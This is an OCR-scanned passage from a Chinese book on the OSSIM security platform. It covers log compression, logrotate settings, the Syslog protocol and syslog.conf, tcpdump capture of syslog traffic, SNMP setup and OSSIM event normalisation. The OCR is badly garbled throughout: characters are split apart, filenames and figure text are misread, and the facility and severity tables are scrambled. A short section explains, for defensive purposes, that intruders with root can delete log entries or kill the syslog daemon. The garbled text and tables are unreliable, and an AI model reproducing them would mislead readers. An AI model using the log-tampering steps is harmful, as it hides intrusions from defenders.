b 23 E———31 102* 50M8  6iems 
b is (———31 78% 38MB  6items as 
b 12 [—— —3 77% 38M8  6items a0 
p 14 E———3 6s% 32M8 6 items 
b 22 [一 一 48* 24MB  6iems an n 
bois C—O 41% 20m8 6 items 
bn L— —3 39% 19MB8  6iems m 
b 20 L———3 39% 19M8 6 items 
b i9 L— —1 39* 19MB  6iíems n 
bau L— —1 39* 19MB  e6items 
b 16 CZ 39* 19m8 6 items 
bas L——3 39% 19m8 6items || 
> 一 ud ^ = 14 12 13 23 


7-11 存储 日 志 分 布 


当然 ， 这 种 文件 在 几 百 KB 或 几 MB 大 小 时 ， 查 询 都 没什么 问题 ， 当 文件 容量 达到 几 百 
MB 甚至 是 上 GB 大 小 时 ， 其 致命 的 缺陷 也 就 开始 暴露 出 来 ， 比 如 我 们 用 grep 和 sort 组 成 的 
shell 过 滤 一 个 含有 10 万 条 日 志 的 access.log 文件 ， 往 往 需 要 1 分 钟 左右 时 间 ， 这 个 时 间 是 管 
理 员 不 能 忍受 的 , 这 需要 按 匹 配 规则 逐个 字 节 去 匹配 , 这 一 过 程 同时 将 不 符合 要 求 的 那些 文件 
逐 行 地 读 了 一 遍 , 时 间 全 花费 在 读 哪 些 根本 不 需要 处 理 的 文件 上 。 假设 在 某 目 录 下 有 100 个 包 
含 10 FITH log 文件 ， 需 要 在 如 此 大 的 范围 找 出 某 个 关键 字 ， 那 么 搜索 时 间 很 难 想象 。 解 决 
方法 之 一 就 是 对 上 面 的 扁平 日 志文 件 进行 索引 , 使 得 通过 日 志 的 关键 元 素 能 够 快速 查询 , 也 便 
于 对 过 期 的 日 志 进 行 批量 销毁 。 
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7.2.6 ”基于 压缩 模式 的 日 志文 件 

在 UNIX/Linux 中 可 以 使 用 tar 将 日 志 压缩 ， 也 可 以 用 zcat 或 zgrep 从 压缩 文件 中 读 取 日 
ak. 但 这 都 需要 我 们 手工 输入 脚本 实现 ,对 于 一 些 普通 用 户 显得 有 些 力不从心 ，logrotate 可 以 
方便 地 实现 日 志 的 轮 询 、 压 缩 功 能 ， 可 以 在 日 志 增 长 到 一 定 大 小 时 ， 或 在 每 天 、 每 周 时 间 到 达 
时 ， 产 生 新 的 日 志文 件 。 


agent.log 

agent.log.1.gz 
agent.log.2.gz 
agent.log.3.gz 
agent.log.4.gz 
agent.log.5.gz 


reputation.log 

reputation.log.1.gz 
reputation.log.2.gz 
reputation.log.3.gz 
reputation.log.4.gz 
reputation.log.5.gz 


monit.log 

monit.log.1.gz 
monit.log.2.9z 
monit.log.3.gz 
monit.log.4.gz 
monit.log.5.9gz 


agent error.log 
agent error.log.1.gz 


agent error.log.3.gz 


nessus cron.log 

nessus cron.log.1.gz 
nessus cron.log.2.gz 
nessus cron.log.3.gz 


rrd plugin.log 

rrd plugin.log.1.9gz 
rrd plugin.log.2.gz 
rrd plugin.log.3.gz 


agent error.log.2.gz g 

Y nessus cron.log.4.gz rrd plugin.log.4.gz 
nessus cron.log.5.gz rrd plugin.log.5.gz 
nessus jobs sem.log 


agent error.log.4.gz 
agent error.log.5.gz 
arpwatch-ethO. log 


对 于 这 些 日 志 的 处 理 需 要 掌握 以 下 方法 : 


#gzip access.log \\ 压 缩 文件 并 生成 access .1og.gz 文 件 


#gunzip access.log.gz \\ 解 压缩 

#gunzip -c access.log.gz |grep xx \\ 查 找 .gz 包 中 的 内 容 
#zcat access.log.gz \\ 查 看 压缩 文件 内 容 
#zmore access.log.gz \\ 查 看 压缩 文件 内 容 
#zdiff access.log.1.gz access.log.2.gz \\ 比 较 两 个 压缩 文件 差异 
#zcat access.log.*.gz |goaccess \\ 批 量 分 析 日 志 


在 gzip 压缩 文件 中 搜索 ，zgrep 与 zcat 很 相似 ， 可 以 用 于 gzip 压缩 过 的 文件 。 它 与 grep 
有 相似 的 命令 选项 ， 例 如 : 

#zgrep -i error /var/log/syslog.1.gz 

将 日 志 * . 1og .gz 结尾 的 文件 合并 

#cat *.log.gz > file 

#zcat $(ls -t *.log.gz) | gzip > new file.gz 


7.2.7 日 志 转 储 到 数据 库 

很 多 情况 下 我 们 需要 将 日 志 存储 到 数据 库 ， 因 为 那样 在 创建 日 志 分 析 报表 , 以 及 多 台 网络 
设备 关联 日 志 分 析 时 非常 方便 , 而 且 日 志 信 息 可 以 通过 标准 的 SQL 查询 快速 搜索 到 日 志 记录 ， 
而 且 也 便于 集中 权限 管理 。 从 事 过 数据 库 管 理 的 读者 一 定 知道 ， 海 量 日 志 存 入 数据 库 系统 中 ， 
不 但 数据 量 太 庞大 , 而 且 无 法 避免 地 造成 数据 库 系统 开销 显著 增加 ， 因 为 向 数据 库 中 写 入 同样 
-个 数据 ， 比 写 入 磁盘 文本 文件 所 花 销 的 时 间 要 长 〈 包 括 网 络 延 迟 、SQL 解析 、 索 引 更 新 、 
磁盘 写 入 等 时 间 )。 即 使 在 数据 库 中 构建 了 索引 和 查询 优化 ， 但 在 上 亿 行 数 据 中 搜索 还 是 会 变 
得 非常 迟缓 。 
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面 对 这 一 问题 应 该 清楚 , 我 们 需要 具体 将 哪些 日 志 存 储 到 数据 库 。 作 为 计算 机 取证 , 又 要 
求 需要 完整 的 RAW LOG， 也 就 是 未 经 任何 修改 的 日 志 。 对 于 OSSIM 系统 而 言 ， 既 要 兼顾 性 
能 ， 又 要 做 到 日 志 完 整 ， 所 以 采取 的 混合 和 存储 的 方式 会 更 好 。 在 OSSIM 系统 中 ， 原 始 日 志 
通过 Rsyslog 收集 存储 在 OSSIM Server， 同 时 经 过 Agent 归 一 化 处 理 ， 并 经 过 提炼 的 带 有 一 定 
级 别 关 键 事 故 的 日 志 会 被 存储 在 MySQL 数据 库 ， 以 便 输 出 报表 。 


7.2.8 日志 处 理 及 保存 时 间 

日 志 中 保存 了 系统 故障 、 配 置 错误 、 数 据 访问 日 志 、 攻 击 日 志 等 丰富 内 容 , 对 于 归档 日 志 
需要 进行 完整 性 监控 ,而且 在 审计 中 要 求 日 志 留 存 历史 至 少 一 年 ,保持 在 线 三 个 月 可 查询 。 可 
参考 2.16.11 节 中 有 关 事件 保存 时 间 的 要 求 ， 同 时 ， 作 为 企业 的 安全 人 员 每 天 应 该 审核 日 志 系 
统 的 所 有 组 件 并 查看 各 种 分 析 报表 。 


7.2.9 “日志 系统 保护 

对 于 日 志 的 安全 , 其 受 重视 程度 不 亚 于 部 队 对 军火 库 的 重视 。 攻击 者 有 意 无 意 地 会 针对 日 
志 系 统 展开 攻击 , 因此 我 们 应 对 日 志 集中 存储 的 系统 进行 更 加 严格 的 保护 。 首先 保证 日 志 传输 
安全 (通过 SSL, SSH EÈ IPSEC 加 密 ), 其 次 保证 日 志 主 机 可 用 , 保证 关联 引擎 分 析 的 可 用 性 ， 
防止 有 时 候 大 量 泛 洪 攻击 生成 了 很 多 干扰 报警 使 关联 引擎 处 理 不 过 来 。 


7.2.10 日 志 轮 询 

日 志 轮 询 相当 于 日 志 的 多 份 复制 ， 目 的 是 节省 磁盘 空间 ， 用 于 短期 分 析 和 存储 ， 它 在 
OSSIM 中 使 用 的 技术 是 由 logrotate 工具 实现 。 日 志 轮 询 可 以 采用 两 种 策略 : 

e 基于 大 小 的 轮 询 : 日 志文 件 达到 某 个 预 设 值 时 轮 询 ， 例 如 SOMB F. 

e 基于 时 间 的 轮 询 : 日 志文 件 根据 某 个 设 定 周 期 开始 轮 询 ， 例 如 每 天 、 每 周 等 。 

OSSIM 系统 下 日 志 轮 询 由 logrotate 负责 ， 它 的 参数 配置 文件 放 在 两 个 地 方 : 

€ /etc/logrotate.conf， 主 要 的 参数 文件 。 

€ /etc/logrotate.d/， 此 目录 下 的 所 有 文件 会 被 读 入 logrotate.conf， 如 没有 指定 则 以 

logrotate.conf 中 的 为 准 。 


/etc/logrotate.d/ 包 含 apache2、alienvault-api、heartbeat、ossim-agent、alienvault-api-core、 
snort、redis-server、ossim-server 等 文件 。 下 面 以 apache2 配置 文件 为 例 ， 讲 解 配 置 文件 中 的 含 
义 ， 如 图 7-12 所 示 。 
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lienvault:/etc/logrotate.d# cat apache2 
var/log/apache2/*.1log t 
1 


— c» JG 


rotate 52 
conpress 
delayconpress 
notifempty 
create 640 root adm 
sharedscripts 
postrotate 
/etc/init.d/apache2 reload > /dev/null 
endscript 


à l ienvau lt :7etc/ logrotate .dit 
图 7-12 Apache 日 志 轮 询 配 置 及 解释 
Rotate 的 值 为 52, 代表 该 设置 在 从 系统 中 删除 日 志文 件 之 前 , 将 保留 最 后 52 个 消息 ; weekly 
表示 日 志 将 每 周 轮转 一 次 。Logrotate 中 的 其 他 选项 是 每 月 和 每 天 轮转 。 这 个 脚本 的 启动 由 
/etc/cron.daily/logrotate 下 的 计划 任务 负责 执行 。 


7.2.11 OSSIM 分 布 式 系统 中 日 志 存 储 问 题 
本 书 第 2 章 详细 讲解 了 OSSIM 分 布 式 系统 架设 , 这 里 将 分 析 这 种 系统 下 的 日 志 存 储 问 题 ， 
根据 图 2-37 COSSIM 分 布 式 安装 ) 所 示 ， 有 以 下 两 种 日 志 存 储 方案 


CD 网 络 应 用 及 交换 机 、 路 由 器 日 志 , 转发 日 志 到 它们 所 在 VLAN 的 Sensor 中 ,那么 其 
RAW LOG 会 存储 在 Sensor 端 ， 而 标准 化 处 理 后 的 事件 会 发 送 到 OSSIM Server 端 ， 经 过 关联 
分 析 后 ， 结 果 保 存 到 Server 端 MySQL 数据 库 中 ， 这 样 所 有 RAWLOG 会 分 散在 多 个 Sensor 
中 。 如 果 一 旦 Sensor 宕 机 出 现 了 数据 丢失 ， 则 原始 日 志 不 保 。 

(2) 将 网 络 应 用 1ISapache 交换 机 等 日 志 发 送 到 OSSIM Server 端 ， 专 门 负责 收集 的 一 块 
网 卡 中 ， 例 如 OSSIM 端 有 三 块 网 卡 : 

€ eth0: 管理 接口 (IP1) 

€ ethl: 噢 探 口 (无 IP 地址 ) 

€ eth2: 日 志 接 收口 (IP2) 


那么 日 志 将 转发 到 eth2 O, 全 网 RAW Log 数据 集中 存储 在 /var/log/alienvault/device/ 目 录 ， 
与 此 同时 经 插件 归 一 化 处 理 后 的 事件 会 存储 在 alienvault_siem 库 中 。 


日 志 协 议 Syslog 


完善 的 日 志 分 析 系 统 应 该 能 够 通过 多 种 协议 〈 包 括 Syslog 等 ) 进行 日 志 采 集 并 对 日 志 进 
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行 分 析 。 因 此 ， 日 志 分 析 系 统 首先 需要 实现 对 多 种 日 志 协 议 的 解析 。 其 次 ， 需 要 对 收集 到 的 海 
量 日 志 信 息 进行 分 析 ， 再 利用 数据 挖掘 技术 ,发 现 隐藏 在 这 些 日 志 中 的 安全 问题 。 本 章 将 介绍 
日 志 采 集中 的 各 种 协议 及 使 用 方法 。 

Syslog 在 UNIX 系统 中 应 用 广泛 ， 它 是 一 种 标准 协议 (RFC3164)， 负 责 记 录 系 统 事件 
(event) 的 一 个 后 台 程 序 ， 记 录 内 容 包括 核心 、 系 统 程序 的 运行 情况 及 所 发 生 的 事件 。Syslog 
协议 使 用 UDP 作为 传输 协议 ， 通 过 514 端口 通信 ，Syslog 使 用 syslogd 后 台 进 程 ，syslogd JH 
动 时 读 取 配置 文件 /etc/syslog.conf， 它 将 网 络 设备 的 日 志 发 送 到 安装 了 Syslog 软件 系统 的 日 志 
服务 器 ，Syslog 日 志 服务 器 自动 接收 日 志 数据 并 写 到 指定 日 志文 件 中 。 


7.3.1 常见 日 志 收集 方式 

在 网 络 管理 中 用 来 采集 日 志 数 据 的 方式 包括 : 文本 方式 采集 、SNMP Trap 方式 采集 ， 以 
及 Syslog 协议 收集 。 

1. 文本 方式 

以 文本 方式 采集 日 志 数 据 主 要 是 指 通过 SMB 方式 共享 , 或 者 邮件 发 送 , 或 者 以 FTP 上 传 
方式 来 收集 设备 日 志 数 据 。 这 几 种 方式 的 共同 点 主要 以 原始 日 志 为 主 , 不 能 对 日 志 进 行 深度 分 
析 。 随 着 大 数据 时 代 的 到 来 ， 日 志 的 产量 越 来 越 大 ， 所 以 这 种 方式 不 适应 今后 的 网 络 发 展 ， 但 
是 分 析 原 始 日 志 的 基本 方法 需要 大 家 掌握 。 

在 图 7-13 中 显示 了 Squid 代理 服务 器 原始 日 志 的 格式 ， 由 于 宛 长 且 不 便 阅 读 ， 人 们 通常 
会 把 Raw Log 经 过 预 处 理 后 再 显示 。 


Recent Proxy Log Events 


Eomatedlogs Raw Logs 
Showing : 1to 25 of about 1000 logs 上 View perpage: 5 10 20 [25] 50 75 100 250 509 

:348528850.183 302 192.168.150.201 TCP. MISS/200 110476 GET hti /safebrowsing-cache google convsafebrowsing/rc/ChFnb29nL XBoaXNoLXNoYXZhchAAGMHyECCASRAqCVI 
348528649 .867 452 192.168.150.201 TCP. MISS/200 140257 GET htpJsafebrowsing-cache google com/safebrowsing/rc/ChFnb29nLXBoaXNoLXNoYXZhchAAGIHWECDABhAyLQE- 
:348528849.399 392 192.168.150.201 TCP. MISS/200 113458 GET http /safebrowsing-cache google com/safebrowsing/rc/ChFnb29nL XBoaXNoLXNoYXZhchAAGMHIECCABBAyLcE: 
:348528848.930 533 192.168.150.201 TCP, MISS/200 121846 GET htt /safebrowsing-cache google convsafebrowsing/rc/ChFnb29nL XBoaXNoLXNoYXZhchAAGIHECDA7RAyLYE1 
:348528848.324 300 192.168.150.201 TCP. MISS/200 96527 GET http:/safebrowsing-cache google.comvsafebrowsing/rt/ChFnb29nLXBoaXNoLXNoYXZhchAAGNHOECCAÓXAyLUEC 
2348528847.997 120 192.168.150.201 TCP. MISS/200 36172 GET http//safebrowsing-cache google.comsafebrowsing 


Ard/ChFnbz9nLXBoaXNoLXNoYXZhchABGIGQCC CApAgakQKICQIA 
DIRECTI7Z.125.31.100 application/vnd. google safexrowsing-chunk 


Done 


图 7-13 原始 日 志 格 式 
格式 化 处 理 的 日 志 相 当 规 整 ， 符 合 人 们 的 阅读 习惯 ,方便 查找 问题 ， 如 图 7-14 所 示 。 


383 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


Recent Proxy Log Events 


Formatted Logs Raw Logs O ANC - di Configure Columns 
Showing ` 1 to 25 of about 1000 logs [x] ] 3 Pa "5 100 250 500 
os 
E User 
Device Host User Protocol Destination Date/Time 网 Protocol 
F Desinaton 
febrowsir 24 Sep. 问 Date/Time. 
satebrovsing- | 
192168150144 92108150200 Urknown "P ce 2012,  Mipsakbwsing-cache google comsatebrovsirg L] Calegoyy 5NHyECCAgRAqCVB 
192050 & un. 
salebromsing. 245ep E. Total Bytes (in bytes) 
Mp 2012, —— Mipisalebrowing cache google comvsatebrowsin, 四 Duration SHwECDABNAYL QE4 
192158150144 192168150.201 Unknown eachegooglecon oir io E ERE 
Status 
salebrowsing- 24 Sep Ri COKI Conca 
162188150141 19216815020 Unknown "P cachegooglecom Zole,  "üP/salebrowiingcache google con/sateuowsing SMHIECCABBAYLcE2 
gatohinwsinn 24 Sep ic: 


Done 


图 7-14 处理 过 后 的 日 志 
2. SNMP Trap 方式 


对 于 建立 在 SNMP (Simple Network Management Protocol) 上 的 网 络 管理 , 可 以 通过 SNMP 
Trap 方式 来 进行 日 志 数 据 的 采集 。Trap 指 的 是 被 管理 设备 向 SNMP. 管理 者 发 送 的 通告 网 络 的 
陷阱 报 文 ， 比 如 设备 的 冷 热 启动 ,一 些 端口 状态 的 不 可 用 ， 以 及 用 户 登 录 失 败 等 事件 。 在 网 络 
中 设备 的 日 志 ， 通 过 对 SNMP 数据 报 文中 Trap 值 的 解读 ， 就 可 以 获得 关于 该 网 络 设备 的 故障 
信息 。 


3. Syslog 方 式 

Syslog 协议 应 用 在 服务 器 、 路 由 器 以 及 交换 机 等 网 络 设备 中 , Syslog 能 够 记录 系统 中 发 生 
的 各 种 事件 和 活动 ， 而 且 Syslog 能 够 以 远程 的 方式 接收 来 自 设备 的 日 志 记 录 ， 能 够 把 来 自 多 
个 设备 的 日 志 记录 以 文件 形式 进行 保存 ， 用 这 种 方法 收集 日 志 在 企 业 应 用 中 最 为 常见 。 


7.3.2 日 志 的 标准 化 

由 于 不 同 网 络 设备 所 产生 的 日 志 格式 不 同 , 这 就 需要 我 们 将 不 同 格式 的 日 志 转化 为 统一 格 
式 。 例 如 记录 日 期 ， 有些 系统 的 日 志 使 用 mm/dd/hr:mm:ss 格式 ， 有 些 会 使 用 24 小 时 的 记录 方 
式 。 标 准 化 就 需要 将 这 些 时 间 记 录 格 式 转化 为 统一 的 格式 。 标 准 化 不 仅 限于 时 间 格 式 的 统一 ， 
而 要 将 所 有 日 志 的 格式 尽 可 能 统一 ， 以 便 数据 的 查询 处 理 。 


7.3.3 主流 日 志 格式 介绍 

目前 主流 网 络 设备 所 产生 的 日 志 格式 主要 有 三 种 :Syslog, Traffic Log 和 国际 通行 的 WELF 
(WebTrends Enhanced Log Format)。 一 个 Syslog 消息 完整 格式 由 三 个 可 识别 的 部 分 所 组 成 : 

€ PRI: 优先 级 Priority 

© HEADER: 报头 

@ MSG: 消息 描述 
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Syslog 消息 并 没有 对 最 小 长 度 有 所 定义 但 报 文 的 总 长 度 必须 在 1024 字 节 之 内 。 其 中 PRI 
部 分 必须 有 3 个 字符 ， 以 “<” 为 起 始 符 ， 然 后 紧 跟 一 个 数字 ， 最 后 以 “>” 结 尾 。 在 括号 内 
的 数字 被 称 为 Priority 优先 级 )，Priority 值 由 Facility 和 Severity 两 个 值 计算 得 出 ， 这 两 个 值 
的 级 别 和 含义 见 表 7-1 和 表 7-2。 大 家 先 看 个 例子 : 

«30»0ct 10 20:30:10 fedora auditd [1780]: The audit daemon is exiting 


其 中 <30> 是 PRI 部 分 ， 即 Priority, HUE EE] 0-191. 

“Oct 10 20:30:10 fedora” 是 HEADER (报头 ) 部 分。 

“auditd [1780]: The audit daemon is exiting” 是 MSG (消息 描述 ) 部 分 。 

在 PRI 部 分 ， 该 数值 和 Facility, Level 有 关 , Facility 是 创建 日 志 的 实体 ， 比 如 由 Kernel 


产生 ， 还 是 User 产生 ， 或 者 是 Mail 产生 …… 而 level 可 以 看 成 是 日 志 的 级 别 。 他 们 的 关系 可 
以 利用 公式 推导 : 
Priority-Facility X 8 + Level (公式 7-1) 


后 台 监 控 程 序 会 被 分 配 一 个 facility 值 ， 而 没有 被 分 配 到 facility 值 的 进程 则 会 使 用 “local 
user” 的 facilities 值 ， 比 如 很 多 网 络 设备 都 会 默认 使 用 facility {H “local user 7” 来 发 送信 息 。 
XF “SYSLOG Facility” 的 理解 ， 大 家 可 以 参考 7.17.2 节 中 有 关 Snare 配置 的 相关 内 容 。 


表 7-1 ”定义 Facility 级 别 


编号 Facility 编号 Facility 

0 Kernel Messages〈 内 核 生 成 的 日 志 消 息 ) NTP subsystem (NTP 日 志 消 息 ) 

1 User-level messages 〈 用 户 日 志 消息 ) Log audit 

2 Mail system 〈 邮 件 系统 日 志 消息 a | Log alert 

3 System daemons (系统 守护 进程 消息 ) Clock daemon 

4 Security/authorization messages (ZAE HH EY p localuse 0 (系统 保留 ) 
息 ) 

5 Messages generated intermally by syslogd syslog localuserl 
(自己 的 日 志 消息 ) 

6 Line printer subsystem 〈 打 印 机 日 志 消息 ) Ea localuser2 

ki Network news subsystem. (新 闻 服务 日 志 消 息 ) 19 localuser3 

8 UUCP subsystem (UUCP HEW E) 20 localuser4 

9 Clock daemon 〈 时 钟 进程 ) 21 localuser$ 

10 Security/authorization messages 22 localuseró 

11 FTP daemon (FTP 日 志 消 息 ) 23 localuser7 


从 分 类 能 看 出 来 Syslog 的 Facility 有 一 部 分 (序号 16~23) 是 为 其 他 程序 预 留 的， 例如 
Cisco 设备 使 用 local4 发 送 PIX 防火 墙 的 Syslog 日 志 。 
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表 7-2 严重 等 级 描述 
Severity 
Emergency (系统 不 可 用 ) 5 Notice (具有 重要 性 的 普通 事件 ) 
Alert( 必 须 马上 采取 措施 ) 6 Informational (有 用 事件 ) 
Critical (关键 事件 ) 7 Debug (调试 信息 ) 
8 
9 


Error (错误 事件 ) BRT none 之 外 的 所 有 级 别 
Warning (警告 事件 ) None 没有 优先 级 ， 用 于 排 错 


0 
1 
2 
3 
4 


7.3.4 Syslog 日 志 记 录 级 别 


由 于 Syslog 反映 系统 底层 的 诸多 信息 ， 它 记录 的 信息 非常 全 面 ， 并 把 日 志 分 为 8 种 优先 
级 ， 如 图 7-15 所 示 。Syslog 记录 的 系统 事件 有 系统 、 网 络 、 高 可 用 等 ， 每 种 事件 都 分 为 0 
= 


€ 系统 内 核 产 生 的 0~7 级 ， 包 括 相关 的 硬件 问题 。 

€ ”网络 部 分 产生 的 0~7 级 。 

e ”高 可 用 性 部 分 产生 的 0~7 级 。 

@ 设备 驱动 程序 的 0~7 级 。 

© 各 类 系统 daemon 产生 的 0~7 级， 如 SNMP 模块 。 

© 系统 服务 模块 ， 如 WWW、DNS、MAIL、Squid、 各 种 防 病 毒 软件 。 

€ 第 三 方 和 应 用 系统 ， 如 Tripwire, TCP Wrapper, Snort, CheckPoint 等 。 
© 系统 管理 过 程 中 产生 的 syslog. 

€ 用 户 写 在 /etc/services 中 的 服务 程序 。 

© 用 户 开 发 程序 使 用 Syslog API 产生 的 日 志 。 


7-15 ”SYSLOG 日 志 的 8 种 优先 级 


7.8.5 Syslog.conf 配置 文件 
Syslog.conf 是 syslogd 进程 的 配置 文件 ， 在 程序 启动 时 读 取 ， 其 格式 为 facility.level， 由 上 
面 两 张 表 中 的 facility 和 Severity 所 组 成 之 间 用 点 分 阳 。 下面 以 CentOS 5.x 为 例 讲解 Syslog.conf 


386 


配置 文件 中 关键 语句 的 作用 ， 如 图 7-16 所 示 。 


#cat /etc/syslog.conf 


dev/console 


r/log/messages 


TIME r/log/secure 
all the mail m 


/log/maillog 


var/log/cron 


level crit and higher in a special file 
var7log/spooler 
also to boot.log 
var/log/boot. log 


图 7-16 syslog 配置 

下 面 解释 一 下 这 个 配置 的 含义 : 

(1) *.info;mail.none;authpriv.none /var/log/messages 

含义 : 将 info 或 更 高 级 别 的 消息 送 到 /var/log/messages， 除 了 mail 以 外 ， 其 中 * 是 通配符 ， 
代表 任何 设备 ，none 表示 不 对 任何 级 别 的 信息 进行 记录 。 

(2) authpriv.* /var/log/secure 

含义 : 将 authpriv 设备 的 任何 级 别 的 信息 记录 到 /var/log/secure 文件 中 ， 这 主要 是 一 些 和 
认证 、 权 限 使 用 相关 的 信息 。 

(3) mail.* /var/log/maillog 

含义 : 将 mail 设备 中 的 任何 级 别 的 信息 记录 到 /var/log/maillog 文件 中 ,这 主要 是 和 电子 邮 
件 相 关 的 信息 。 有 的 配置 文件 会 这 样 写 : 


mail.* -/var/log/maillog 


表示 邮件 产生 的 信息 不 直接 存 入 该 文件 ， 而 是 先 存在 缓存 中 ， 也 就 是 不 对 文件 系统 执行 
吕 信 息 量 达到 一 定 程度 后 ， 再 存储 磁盘 ， 所 以 要 注意 正常 关机 ， 和 否则 会 影响 该 文件 的 


(4) cron.* /var/log/cron 

含义 : 将 cron 设备 中 的 任何 级 别 的 信息 记录 到 /varlog/cron 文件 中 ， 这 主要 是 和 系统 中 定 
期 执行 的 任务 相关 的 信息 。 

(5) *.emerg * 


含义 : 将 任何 设备 的 emerg 级 别 的 信息 发 送 给 所 有 正在 系统 上 的 用 户 。 


(6) local7.* /var/log/boot.log 
含义 : 将 和 系统 启动 相关 的 信息 记录 到 /varlog/bootlog 文件 中 。 
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更 多 信息 可 采取 man syslog.conf 的 方式 查询 。 


7.3.6 用 Tcpdump 分 析 Syslog 数据 包 
oe ee p T — : 
为 了 让 大 家 清楚 了 解 远 程 传输 的 syslog 消息 内 容 , 我 们 用 以 下 命令 查看 , 首先 确定 OSSIM 
UM s I: 
中 防火 墙 允许 syslog 包 通 过 ， 然 后 执行 : 
#tcpdump -Xni eth0 port 514 
VirtualUSMAllIn0ne:-/.ansible/tmp& tcpdump -XniethO port 514 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
listening on ethO, link-type EN10MB (Ethernet), capture size 65535 bytes 
02:38:01.601921 IP 192.168.11.09.47164 > 192.168. 11.195, 514: SYSLOG svthpriv.infe, length: 107 
0x0000: 4500 0087 0000 4000 4011 a253 c9a8 0b59 Be. Y 
0x0010: c0a8 0b69 b850 0202 0073 1552 3c38 363e si. IB. .S. ps 
0x0020: 4d61 7220 2032 2031 323a 3235 3a30 3120 Mar..2.12:25:01. 
0x0030: 616c 6965 6e76 6175 6c74 2043 524f 4e5b alienvault.CRON[ 
0x0040: 3230 3031 305d 3a20 7061 6d5f 756e 6978 20010]:.pam unix 
0x0050: 2863 726f 6e3a 7365 7373 696f 6e29 3a20 (cron:session):. 
0x0060: 7365 7373 696f 6e20 6f70 656e 6564 2066 session.opened.f 


0x0070: 6f72 2075 7365 7220 726f 6174 2062 7920 or.user.root.by. 
0x0080: 2875 6964 3430 29 (uid=9) 


7.3.7 Syslog 的 安全 漏洞 

尽管 Syslog 协议 在 网 络 日 志 的 管理 方面 做 得 非常 优秀 ， 提 供 了 跨 平台 的 日 志 传输 通道 和 
日 志 存储 策略 。 如 果 使 用 Syslog Server 进行 日 志 集中 管理 ，Syslog 使 用 UDP 协议 进行 打包 传 
送 的 数据 就 难 辩 真 伪 ， 从 而 使 得 Syslog 协议 失去 意义 而 彻底 崩溃 。Syslogd 是 以 明文 的 形式 传 
送 数据 的 ， 入 侵 者 用 tcpdump 之 类 的 网 络 工具 可 以 轻而易举 地 获取 传送 数据 。 但 是 在 信息 安 
全 等 方面 仍 存在 着 漏洞 。 

Syslog 程序 以 明文 形式 存储 数据 ， 入 侵 者 可 以 从 /var/log/ 下 获取 这 些 数 据 。 当 然 这 需要 拥 
有 root 权限 。 一 旦 入 侵 者 获得 root 权限 ， 就 可 以 肆意 算 改 /var/log 或 /varadm 下 的 文件 ， 并 
删除 入 侵 记录 ， 而 这 么 做 不 会 留 下 痕迹 。 

WRAHA IA Linux 系统 后 ， 除 了 修改 日 志 以 外 ， 还 有 可 能 通过 一 条 “kill all syslogd” 

命令 而 结束 Syslog 守护 进程 ， 这 样 会 阻止 日 志 的 记录 ， 即 便 是 有 远程 日 志 收 集 系统 也 无 济 于 
事 。 如 果 系 统管 理 员 将 syslogd 重 命令 为 其 他 名 称 ， 从 而 可 以 躲避 这 种 攻击 。 


7.3.8 配置 SNMP 
下 面 讲解 配置 SNMP 的 几 个 主要 步 又 : 


(1) f£ OSSIM 中 启动 SNMP. 
(2) 编辑 /etc/ossim/ossim_setup.conf。 


将 snmpd=no 修改 成 snmpd=yes ，snmptrap=no 修改 成 snmptrap=yes。 


(3) 测试 SNMP。 
@ 本 机 测试 SNMP 
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测试 环境 采用 community 字符 串 为 public。 


下 面 会 显示 很 长 输出 : 


如 果 获 取 到 大 量 数据 ， 说 明 SNMP 服务 成 功 启动 。 
@ 远 程 主机 测试 
先 关闭 防火 墙 。 


在 OSSIM 系统 里 SNMP 日 志 记录 在 /var/log/daemon.log 文件 中 。 例 如 : 


J.L 原始 日 志 格式 对 比 


原始 日 志 可 能 是 一 个 通用 的 系统 消息 、 应 用 程序 日 志 、SNMP Trap， 但 是 这 些 日 志 格式 不 
统一 ， 无 法 做 关联 分 析 ，OSSIM 需要 将 它们 输出 成 统一 格式 ， 下 面 我 们 先 看 个 例子 。 
举例 : 我 们 先 查看 一 条 SSH 的 日 志 也 是 原始 日 志 格式 。 主 机 server1，/varlog/auth.log X 
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件 显 示 内 容 如 下 : 
May 30 13:15:52 server-1 sshd[13980]: Accepted pasword for root from 
192.168.150.20 port 4545 ssh2 


经 过 归 一 化 日 志 处 理 后 会 发 生 什 么 变化 呢 ? 这 些 字 段 可 以 从 日 志 消息 填充 。 处 理 后 的 日 
志 也 就 是 在 OSSIM Sensor 机 器 中 的 日 志 /var/log/ossim/agent.log， 内 容 如 下 : 


2013-05-30 13:15:49,441 Output [INFO] :event type="detector" date="1275239780" 
sensor="192.168.150.201" interface="eth0" plugin id="4003" plugin sid="7" 
src_ip="192.168.150.20" src port-"4545" dst ip-"192.168.150.200" dst port-"22" 
username-"root" log-"May 30 13:52 server-1 sshd[13980]:Accepted password for root 
from 192.168.150.20 port 4545 ssh2" fdate-"2013-05-30 13:15:52" tzone-"8.0" 


从 内 容 上 看 起 来 比 原来 复杂 了 许多 , 但 这 是 为 了 统一 标准 格式 它 会 传送 至 Server 的 EDB 
数据 库 中 统一 存储 。 

我 们 再 看 看 OSSIM 服务 器 对 于 这 样 的 事件 都 做 了 哪些 处 理 呢 ? 这 包括 特定 的 类 型 和 子 类 
型 以 及 该 资产 的 值 。OSSIM Server E/var/log/alienvault/server.log 内 容 如 下 : 


2013-05-30 06:48:41 OSSIM-Message: Event received: event id-"0" alarm-"0" 
type-"detector" fdate-"2013-05-30 13:15:52" date-"1275239780" 
tzone-"8.0"plugin id-"4003" plugin sid-"7" src ip-"192.168.150.20" 
src port-"4545" dst ip-"192.168.150.200" dst port-"22" sensor-"192.168.150.201" 
interface-"eth0" protocol-"TCP" asset src-"2" asset dst-"2" log-"May 30 13:15:52 
server-lsshd[13980]: Accepted password for root from 192.168.150.20 port 4545 ssh2" 
username-"root" 


随后 ， 系 统 通过 Web 界面 展示 在 前 台 的 控制 台 上 ， 用 户 可 以 通过 访问 SIEM 查看 。 


插件 配置 步骤 


经 过 以 上 描述 ， 大 家 了 解 收集 日 志 的 流程 ， 接 下 来 就 要 建立 脚本 ， 步 骤 如 下 : 
(1) 新 建 插件 文件 ， 通 常 复制 一 个 现 有 的 脚本 文件 ， 并 修改 其 内 容 ， 以 符合 新 的 应 用 程 


D 定义 一 个 通用 规则 ， 这 是 最 后 的 规则 ， 它 捕获 所 有 的 事件 ， 不 能 根据 特定 规则 进行 
分 组 。 


